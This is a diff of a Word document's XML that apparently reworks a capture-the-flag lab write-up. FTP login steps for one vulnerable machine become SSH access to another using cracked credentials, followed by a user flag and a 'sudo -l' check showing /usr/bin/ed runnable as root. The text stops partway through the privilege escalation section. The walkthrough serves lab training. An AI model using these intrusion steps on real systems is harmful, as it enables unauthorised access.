+        <w:t>Using the cracked credentials, SSH access to the machine was attempted.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7736,7 +7717,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>ftp 172.20.10.3</w:t>
+        <w:t>ssh sunset@172.20.10.2</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7756,7 +7737,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Login credentials:</w:t>
+        <w:t>Password used:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7802,49 +7783,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">Username: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>jangow01</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">Password: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>abygurl69</w:t>
+        <w:t>cheer14</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7864,7 +7803,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>The login was successful, providing access to the user's home directory.</w:t>
+        <w:t>Login was successful and a shell was obtained.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7879,16 +7818,13 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:noProof/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FF6DD96" wp14:editId="2D2796E6">
-            <wp:extent cx="5731510" cy="2758440"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
-            <wp:docPr id="432862225" name="Picture 39"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08E2C86A" wp14:editId="5536F360">
+            <wp:extent cx="5731510" cy="4118610"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="1294395650" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -7896,17 +7832,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="432862225" name="Picture 432862225"/>
+                    <pic:cNvPr id="1294395650" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17" cstate="print">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
+                    <a:blip r:embed="rId17"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -7914,7 +7844,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="2758440"/>
+                      <a:ext cx="5731510" cy="4118610"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -7954,7 +7884,11 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -7966,6 +7900,53 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:t>Retrieving the User Flag</w:t>
       </w:r>
@@ -7987,7 +7968,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>After logging in via FTP, the directory structure was explored.</w:t>
+        <w:t>After gaining access to the system, the home directory was explored.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8007,7 +7988,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Commands used:</w:t>
+        <w:t>Command:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8053,49 +8034,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>ls</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>cd /home</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>cd jangow01</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>ls</w:t>
+        <w:t>ls -all</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8201,7 +8140,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>The file was downloaded using:</w:t>
+        <w:t>Command:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8247,7 +8186,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>get user.txt</w:t>
+        <w:t>cat user.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8267,7 +8206,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Viewing the flag:</w:t>
+        <w:t>User flag:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8313,7 +8252,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>cat user.txt</w:t>
+        <w:t>5b5b8e9b01ef27a1cc0a2d5fa87d7190</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8328,12 +8267,174 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>User flag:</w:t>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58250B07" wp14:editId="2024E190">
+            <wp:extent cx="5038095" cy="2142857"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="311733621" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="311733621" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5038095" cy="2142857"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Privilege Escalation</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>To identify possible privilege escalation vectors, the following command was executed:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8379,7 +8480,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>d41d8cd98f00b204e9800998ecf8427e</w:t>
+        <w:t>sudo -l</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8395,134 +8496,31 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:noProof/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48993636" wp14:editId="0255B5AE">
-            <wp:extent cx="5731510" cy="3000375"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
-            <wp:docPr id="587829714" name="Picture 40"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="587829714" name="Picture 587829714"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId18" cstate="print">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="3000375"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The output revealed that the user </w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Privilege Escalation Enumeration</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>The kernel version of the system was checked.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Command:</w:t>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>sunset</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> could run the following command as root:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8568,7 +8566,35 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>uname -a</w:t>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>/bin/ed</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8588,7 +8614,162 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Output:</w:t>
+        <w:t>without requiring a password.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="104F3AAE" wp14:editId="35BC3C4F">
+            <wp:extent cx="5731510" cy="652780"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="475220026" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="475220026" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="652780"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="0"/>
+        <w:rPr>
